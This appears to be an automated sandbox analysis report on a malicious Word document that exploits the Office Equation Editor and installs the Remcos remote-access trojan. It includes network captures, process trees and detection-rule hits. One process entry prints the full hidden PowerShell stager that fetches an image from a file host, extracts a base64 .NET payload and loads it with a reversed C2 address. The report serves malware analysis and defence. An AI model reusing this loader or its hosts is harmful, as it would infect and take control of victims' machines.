                                                      Data Raw: ff fe 27 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 0d 00 0a 00 27 00 0d 00 0a 00 27 00 20 00 43 00 6f 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 63 00 29 00 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 43 00 6f 00 72 00 70 00 6f 00 72 00 61 00 74 00 69 00 6f 00 6e 00 2e 00 20 00 41 00 6c 00 6c 00 20 00 72 00 69 00 67 00 68 00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72 00 76 00 65 00 64 00 2e 00 0d 00 0a 00 27 00 0d 00 0a 00 27 00 20 00 41 00 62 00 73 00 74 00 72 00 61 00 63 00 74 00 3a 00 0d 00 0a 00 27 00 20 00 70 00 72 00 6e 00 70 00 6f 00 72 00 74 00 2e 00 76 00 62 00 73 00 20 00 2d 00 [TRUNCATED]
                                                      Data Ascii: '----------------------------------------------------------------------'' Copyright (c) Microsoft Corporation. All rights reserved.'' Abstract:' prnport.vbs - Port script for WMI on Windows ' used to add, delete and list ports' also for getting and setting the port configuration'' Usage:' prnport [-adlgt?] [-r port] [-s server] [-u user name] [-w password]' [-o raw|lpr] [-h host address] [-q queue] [-n number]' [-me
May 1, 2024 14:55:03.656919956 CEST | 1289 | IN | Data Raw: 00 7c 00 20 00 2d 00 6d 00 64 00 20 00 5d 00 20 00 5b 00 2d 00 69 00 20 00 53 00 4e 00 4d 00 50 00 20 00 69 00 6e 00 64 00 65 00 78 00 5d 00 20 00 5b 00 2d 00 79 00 20 00 63 00 6f 00 6d 00 6d 00 75 00 6e 00 69 00 74 00 79 00 5d 00 20 00 5b 00 2d
Data Ascii: | -md ] [-i SNMP index] [-y community] [-2e | -2d]"'' Examples' prnport -a -s server -r IP_1.2.3.4 -e 1.2.3.4 -o ra
May 1, 2024 14:55:03.657048941 CEST | 1289 | IN | Data Raw: 6e 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 31 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6b 00 41 00 63 00 74 00 69 00 6f 00 6e 00 4c 00 69 00 73 00 74 00 20 00 20 00 20 00 20 00 20 00
Data Ascii: nDelete = 1const kActionList = 2const kActionUnknown = 3const kActionGet = 4const kAct
May 1, 2024 14:55:03.657062054 CEST | 1289 | IN | Data Raw: 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6b 00 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 31 00 32 00 0d 00 0a 00 0d 00 0a 00 27 00 0d 00 0a 00 27 00 20 00 47 00 65 00 6e 00 65
Data Ascii: const kPassword = 12'' Generic strings'const L_Empty_Text = ""const L_Space_Text
May 1, 2024 14:55:03.657073021 CEST | 1289 | IN | Data Raw: 65 00 70 00 75 00 72 00 61 00 72 00 3a 00 22 00 0d 00 0a 00 0d 00 0a 00 27 00 0d 00 0a 00 27 00 20 00 47 00 65 00 6e 00 65 00 72 00 61 00 6c 00 20 00 75 00 73 00 61 00 67 00 65 00 20 00 6d 00 65 00 73 00 73 00 61 00 67 00 65 00 73 00 0d 00 0a 00
Data Ascii: epurar:"'' General usage messages'const L_Help_Help_General01_Text = "Uso: prnport [-adlgt?] [-r porta][-s ser
May 1, 2024 14:55:03.657107115 CEST | 1289 | IN | Data Raw: 00 75 00 6d 00 61 00 20 00 70 00 6f 00 72 00 74 00 61 00 20 00 54 00 43 00 50 00 22 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 5f 00 48 00 65 00 6c 00 70 00 5f 00 47 00 65 00 6e 00 65 00 72 00 61 00 6c
Data Ascii: uma porta TCP"const L_Help_Help_General08_Text = "-h - endereo IP do dispositivo"const L_Help_Help_General09_T
May 1, 2024 14:55:03.657119989 CEST | 1289 | IN | Data Raw: 65 00 72 00 61 00 6c 00 31 00 35 00 5f 00 54 00 65 00 78 00 74 00 20 00 20 00 20 00 3d 00 20 00 22 00 2d 00 72 00 20 00 20 00 20 00 20 00 20 00 2d 00 20 00 6e 00 6f 00 6d 00 65 00 20 00 64 00 61 00 20 00 70 00 6f 00 72 00 74 00 61 00 22 00 0d 00
Data Ascii: eral15_Text = "-r - nome da porta"const L_Help_Help_General16_Text = "-s - nome do servidor"const L_Help_H
May 1, 2024 14:55:03.657155991 CEST | 1289 | IN | Data Raw: 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 5f 00 48 00 65 00 6c 00 70 00 5f 00 47 00 65 00 6e 00 65 00 72 00 61 00 6c 00 32 00 34 00 5f 00 54 00 65 00 78 00 74 00 20 00 20 00 20 00 3d 00 20 00 22 00 70
Data Ascii: const L_Help_Help_General24_Text = "prnport -l -s server"const L_Help_Help_General25_Text = "prnport -d -s server
May 1, 2024 14:55:03.657169104 CEST | 1289 | IN | Data Raw: 20 00 6e 00 6f 00 20 00 65 00 6e 00 64 00 65 00 72 00 65 00 e7 00 6f 00 20 00 49 00 50 00 20 00 65 00 73 00 70 00 65 00 63 00 69 00 66 00 69 00 63 00 61 00 64 00 6f 00 2e 00 22 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 48 00
Data Ascii: no endereo IP especificado."const L_Help_Help_General32_Text = "Se um dispositivo for detectado, uma porta TCP ser
May 1, 2024 14:55:03.657210112 CEST | 1289 | IN | Data Raw: 00 5f 00 48 00 65 00 6c 00 70 00 5f 00 48 00 6f 00 73 00 74 00 30 00 35 00 5f 00 54 00 65 00 78 00 74 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 20 00 20 00 20 00 20 00 20 00 43 00 53 00 63 00 72 00 69 00 70 00 74 00 20 00 2f 00 2f
Data Ascii: _Help_Host05_Text = " CScript //H:CScript //S"const L_Help_Help_Host06_Text = "Voc poder em seguida exe
May 1, 2024 14:55:03.816699028 CEST | 1289 | IN | Data Raw: 54 00 65 00 78 00 74 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 4e 00 e3 00 6f 00 20 00 66 00 6f 00 69 00 20 00 70 00 6f 00 73 00 73 00 ed 00 76 00 65 00 6c 00 20 00 6f 00 62 00 74 00 65 00 72 00 20 00 61 00 20 00 70 00 6f 00 72 00 74 00 61 00
Data Ascii: Text = "No foi possvel obter a porta"const L_Text_Msg_General04_Text = "Porta criada/atualizada"const L_Text_M


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49169 | 107.172.31.6 | 80 | 3544 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
May 1, 2024 14:55:44.470792055 CEST | 76 | OUT | GET /28088/HHRM.txt HTTP/1.1
Host: 107.172.31.6
Connection: Keep-Alive
May 1, 2024 14:55:44.635181904 CEST | 1289 | IN | HTTP/1.1 200 OK
Date: Wed, 01 May 2024 19:55:44 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Wed, 01 May 2024 07:23:35 GMT
ETag: "a1000-6175f5d503acf"
Accept-Ranges: bytes
Content-Length: 659456
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      2 | 192.168.2.22 | 49171 | 178.237.33.50 | 80 | 3800 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      May 1, 2024 14:55:49.996597052 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                                                      Host: geoplugin.net
                                                      Cache-Control: no-cache
                                                      May 1, 2024 14:55:50.180807114 CEST | 1196 | IN | HTTP/1.1 200 OK
                                                      date: Wed, 01 May 2024 12:55:50 GMT
                                                      server: Apache
                                                      content-length: 988
                                                      content-type: application/json; charset=utf-8
                                                      cache-control: public, max-age=300
                                                      access-control-allow-origin: *
                                                      Data Ascii: {
                                                        "geoplugin_request":"149.18.24.96",
                                                        "geoplugin_status":200,
                                                        "geoplugin_delay":"1ms",
                                                        "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",
                                                        "geoplugin_city":"Washington",
                                                        "geoplugin_region":"District of Columbia",
                                                        "geoplugin_regionCode":"DC",
                                                        "geoplugin_regionName":"District of Columbia",
                                                        "geoplugin_areaCode":"",
                                                        "geoplugin_dmaCode":"511",
                                                        "geoplugin_countryCode":"US",
                                                        "geoplugin_countryName":"United States",
                                                        "geoplugin_inEU":0,
                                                        "geoplugin_euVATrate":false,
                                                        "geoplugin_continentCode":"NA",
                                                        "geoplugin_continentName":"North America",
                                                        "geoplugin_latitude":"38.894",
                                                        "geoplugin_longitude":"-77.0365",
                                                        "geoplugin_locationAccuracyRadius":"20",
                                                        "geoplugin_timezone":"America\/New_York",
                                                        "geoplugin_currencyCode":"USD",
                                                        "geoplugin_currencySymbol":"$",
                                                        "geoplugin_currencySymbol_UTF8":"$",
                                                        "geoplugin_currencyConverter":0
                                                      }


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      0 | 192.168.2.22 | 49166 | 104.21.84.67 | 443 | 3148 | C:\Windows\SysWOW64\wscript.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-05-01 12:55:24 UTC | 302 | OUT | GET /d/e1cCs HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: paste.ee
                                                      Connection: Keep-Alive
                                                      2024-05-01 12:55:24 UTC | 1238 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 01 May 2024 12:55:24 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Cache-Control: max-age=2592000
                                                      strict-transport-security: max-age=63072000
                                                      x-frame-options: DENY
                                                      x-content-type-options: nosniff
                                                      x-xss-protection: 1; mode=block
                                                      content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B5O7AHnIg6b%2Fxn6xSdppd4bGyjedyOxh9ZczCwEd4xuwpCwM8QKojdGy6HjuS9eB32g1Vc3Fu7L0QsqbOna31b%2B%2FraQp8Q4BT%2FhgePHYah3TLS93epkAbSs3%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 87cfecfa8f0f3b06-IAD
                                                      alt-svc: h3=":443"; ma=86400


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      1 | 192.168.2.22 | 49167 | 172.67.215.45 | 443 | 3544 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-05-01 12:55:28 UTC | 124 | OUT | GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1
                                                      Host: uploaddeimagens.com.br
                                                      Connection: Keep-Alive
                                                      2024-05-01 12:55:28 UTC | 699 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 01 May 2024 12:55:28 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 4198361
                                                      Connection: close
                                                      Last-Modified: Tue, 23 Apr 2024 14:20:29 GMT
                                                      ETag: "6627c3ad-400fd9"
                                                      Cache-Control: max-age=2678400
                                                      CF-Cache-Status: HIT
                                                      Age: 1618
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IjRY%2BjfVYDmoWwdCmOEluTy9xSiS8KOc8YJnGbxY9DedArAKVOWq%2FbkMPmRhgA0Urm7TU6%2BEZv%2BpzzH8%2BnG6mtyyyY9yRysh07EVztssSOjLfrLmmdT2oFWr0sRiMeGpQpNhw5D3O3pB"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 87cfed11cca882a2-IAD
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Ascii: Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8r
                                                      2024-05-01 12:55:28 UTC1369INData Raw: 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce
                                                      Data Ascii: lW_4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@
                                                      2024-05-01 12:55:28 UTC1369INData Raw: f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8
                                                      Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS


                                                      Session ID:2
                                                      Source IP:192.168.2.22
                                                      Source Port:49168
                                                      Destination IP:172.67.215.45
                                                      Destination Port:443
                                                      PID:3544
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Timestamp:2024-05-01 12:55:30 UTC
                                                      Bytes transferred:100
                                                      Direction:OUT
                                                      Data:GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1
                                                      Host: uploaddeimagens.com.br
                                                      Timestamp:2024-05-01 12:55:30 UTC
                                                      Bytes transferred:690
                                                      Direction:IN
                                                      Data:HTTP/1.1 200 OK
                                                      Date: Wed, 01 May 2024 12:55:30 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 4198361
                                                      Connection: close
                                                      Last-Modified: Tue, 23 Apr 2024 14:20:29 GMT
                                                      ETag: "6627c3ad-400fd9"
                                                      Cache-Control: max-age=2678400
                                                      CF-Cache-Status: REVALIDATED
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oBtBdjKTd2YhNIvqiC85vOWKHIrZmeOYq859RcT7Aj8NM78JRWr6nTeKMPQVKSoLIr%2FHNCwHJ5uyESdtxJU51X6RGCt48oYfEp35VLk5Pkzi%2BWI0rwqKUvYcLezCA7ZZ5CrKDiXmkAFH"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 87cfed1dfee43b18-IAD
                                                      alt-svc: h3=":443"; ma=86400



                                                      Target ID:0
                                                      Start time:14:54:58
                                                      Start date:01/05/2024
                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                      Imagebase:0x13fab0000
                                                      File size:1'423'704 bytes
                                                      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:2
                                                      Start time:14:54:59
                                                      Start date:01/05/2024
                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                      Imagebase:0x400000
                                                      File size:543'304 bytes
                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:14:55:03
                                                      Start date:01/05/2024
                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs"
                                                      Imagebase:0xb10000
                                                      File size:141'824 bytes
                                                      MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:14:55:24
                                                      Start date:01/05/2024
                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                      Imagebase:0x400000
                                                      File size:543'304 bytes
                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:8
                                                      Start time:14:55:24
                                                      Start date:01/05/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
                                                      Imagebase:0xec0000
                                                      File size:427'008 bytes
                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:14:55:25
                                                      Start date:01/05/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }"
                                                      Imagebase:0xec0000
                                                      File size:427'008 bytes
                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000A.00000002.492134092.00000000091E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:14:55:40
                                                      Start date:01/05/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\antre.vbs"
                                                      Imagebase:0x4a990000
                                                      File size:302'592 bytes
                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:15
                                                      Start time:14:55:45
                                                      Start date:01/05/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
                                                      Imagebase:0xff0000
                                                      File size:64'704 bytes
                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.628166706.0000000000791000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:17
                                                      Start time:14:55:55
                                                      Start date:01/05/2024
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\antre.vbs"
                                                      Imagebase:0xfffc0000
                                                      File size:168'960 bytes
                                                      MD5 hash:045451FA238A75305CC26AC982472367
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true


                                                        Execution Graph

                                                        Execution Coverage:23.2%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:54.7%
                                                        Total number of Nodes:53
                                                        Total number of Limit Nodes:8

                                                        Callgraph


                                                        Control-flow Graph

                                                        APIs
                                                        • URLDownloadToFileW.URLMON(00000000,035C04E4,?,00000000,00000000,?,035C0428,?,035C040C,?,035C03F2), ref: 035C054C
                                                          • Part of subcall function 035C0563: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001,?,035C0428,?,035C040C,?,035C03F2), ref: 035C058A
                                                          • Part of subcall function 035C0563: ExitProcess.KERNEL32(00000000,?,035C0591,?,035C0428,?,035C040C,?,035C03F2), ref: 035C05A2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.356926787.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: DownloadExecuteExitFileProcessShell
                                                        • String ID:
                                                        • API String ID: 3584569557-0
                                                        • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                        • Instruction ID: 17a0c12435f09bc646b32f550f3e27160b6a16623af650a2a83597ac040d2e69
                                                        • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                        • Instruction Fuzzy Hash: B6F0E9D45AC3C0EFEA11E7F4AC5EF6A5E287F81609F55048DB1514F0F3D994C9048625
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001,?,035C0428,?,035C040C,?,035C03F2), ref: 035C058A
                                                          • Part of subcall function 035C059D: ExitProcess.KERNEL32(00000000,?,035C0591,?,035C0428,?,035C040C,?,035C03F2), ref: 035C05A2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.356926787.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: ExecuteExitProcessShell
                                                        • String ID:
                                                        • API String ID: 1124553745-0
